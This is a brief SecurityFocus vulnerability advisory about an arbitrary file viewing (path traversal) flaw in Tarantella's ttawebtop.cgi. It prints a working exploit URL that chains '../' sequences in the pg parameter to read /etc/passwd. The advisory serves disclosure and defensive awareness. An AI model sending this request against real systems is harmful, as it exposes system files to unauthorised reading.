Tarantella TTAWebTop.CGI Arbitrary File Viewing Vulnerability

The following web request is sufficient to exploit this vulnerability:

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus